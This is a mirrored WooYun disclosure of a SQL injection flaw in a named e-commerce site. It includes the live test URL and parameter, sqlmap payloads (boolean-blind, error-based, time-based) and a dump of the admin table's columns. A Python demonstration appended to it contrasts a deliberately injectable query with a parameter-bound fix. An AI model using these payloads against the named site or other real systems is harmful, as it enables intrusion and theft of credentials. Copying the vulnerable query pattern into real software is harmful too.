A site belonging to 韩尚聚 has a SQL injection vulnerability

Posted by admin, 2017-04-30 23:47:19 (cn-sec.com mirror of the WooYun report)

Summary
2016-04-14: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2016-05-29: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.

Vulnerability overview
Defect number: WooYun-2016-195121
Title: A site belonging to 韩尚聚 has a SQL injection vulnerability
Vendor: 韩尚聚
Author: unfound
Submitted: 2016-04-14 14:16
Published: 2016-05-29 14:20
Type: SQL injection
Severity: High
Self-assessed rank: 20
Status: Vendor could not be contacted, or the vendor actively ignored the report
Source: www.wooyun.org
Tags: injection techniques

Vulnerability details

Disclosure status:
2016-04-14: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2016-05-29: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.

Brief description:

Detailed description:
Test URL: http://www.koyimall.com/?act=shop.goods_view&GS=219967
Test parameter: GS

sqlmap output:

    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: GS
        Type: boolean-based blind
        Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
        Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END))

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: act=shop.goods_view&GS=219768 AND SLEEP(5)
    ---
    web application technology: Nginx, PHP 5.2.5
    back-end DBMS: MySQL 5.0

Further sqlmap runs against the same injection point returned:

    current user is DBA: False

    Database: koyimall
    Table: durian_buy [851 entries]

Proof of vulnerability:

    Database: koyimall
    Table: durian_admin
    [14 columns]
    +-----------------------+--------------+
    | Column                | Type         |
    +-----------------------+--------------+
    | admin_email           | varchar(70)  |
    | admin_id              | varchar(20)  |
    | admin_is_priv_officer | tinyint(4)   |
    | admin_level           | int(11)      |
    | admin_memo            | varchar(200) |
    | admin_mobile          | varchar(20)  |
    | admin_mod_date        | datetime     |
    | admin_name            | varchar(30)  |
    | admin_nick            | varchar(100) |
    | admin_passwd          | varchar(40)  |
    | admin_reg_date        | datetime     |
    | admin_status          | tinyint(4)   |
    | admin_tel             | varchar(20)  |
    | com_seq               | int(11)      |
    +-----------------------+--------------+

Fix:
You know what to do.

Copyright notice: please credit the source when reposting: unfound@WooYun

Vulnerability response
Vendor response: Unable to contact the vendor, or the vendor actively refused.
Vulnerability rank: 15 (WooYun rating)

Source page: http://cn-sec.com/archives/15540.html
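The report's "Fix" line leaves the remedy unstated, so here is an added illustration of it. This is example code written for this page, not code from the report or from the koyimall site (whose PHP source is not shown anywhere in the report); it uses an in-memory SQLite table with an assumed schema (`goods(gs_id, name)`) in place of the real MySQL goods table, and sqlite3 instead of MySQL, so the report's RLIKE and SLEEP payload forms are not reproduced. The boolean-based CASE expression from the report is used to show why splicing GS into the query text lets the response be steered, and how validating GS as an integer and binding it as a parameter stops that.

```python
import re
import sqlite3

# Constructed sample data standing in for the koyimall goods table.
# Assumption: the real schema is unknown; only the GS id parameter is
# known from the report, so a minimal (gs_id, name) table is used.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE goods (gs_id INTEGER PRIMARY KEY, name TEXT)")
_conn.executemany(
    "INSERT INTO goods VALUES (?, ?)",
    [(219768, "sample item A"), (219967, "sample item B")],
)
_conn.commit()

# Boolean-based blind probes in the shape of the report's CASE payload
# (sqlite3 has no RLIKE, so the condition is ANDed in directly).
TRUE_PAYLOAD = "219768 AND (CASE WHEN (9668=9668) THEN 1 ELSE 0 END)"
FALSE_PAYLOAD = "219768 AND (CASE WHEN (9668=9669) THEN 1 ELSE 0 END)"


def vulnerable_goods_view(gs):
    """Mimics the flaw sqlmap found: the raw GS value becomes part of the SQL text,
    so a true condition returns the product row and a false one returns nothing.
    That observable difference is what 'boolean-based blind' means."""
    sql = "SELECT gs_id, name FROM goods WHERE gs_id = " + gs
    return _conn.execute(sql).fetchone()


def hardened_goods_view(gs):
    """Accepts only a plain decimal product id and binds it as a parameter.
    Anything else (including every payload in the report) is rejected before
    it reaches the database, and the bound value can never alter the query."""
    if not isinstance(gs, str) or re.fullmatch(r"[0-9]{1,10}", gs) is None:
        return None
    row = _conn.execute(
        "SELECT gs_id, name FROM goods WHERE gs_id = ?", (int(gs),)
    ).fetchone()
    return row


def compare(gs):
    """Returns (vulnerable_result, hardened_result) for one GS value."""
    return vulnerable_goods_view(gs), hardened_goods_view(gs)


if __name__ == "__main__":
    for value in ("219768", TRUE_PAYLOAD, FALSE_PAYLOAD):
        print(repr(value), "->", compare(value))
```

Run it with `python3` and the vulnerable lookup returns the row for the true payload and nothing for the false one, while the hardened lookup returns the row only for a plain id. In the PHP/MySQL stack the report identifies, the same shape is a PDO prepared statement with the id bound via `bindValue(':gs', $gs, PDO::PARAM_INT)` after an `is_numeric`/`ctype_digit` check; the principle is identical: the id travels as a bound value, never as query text.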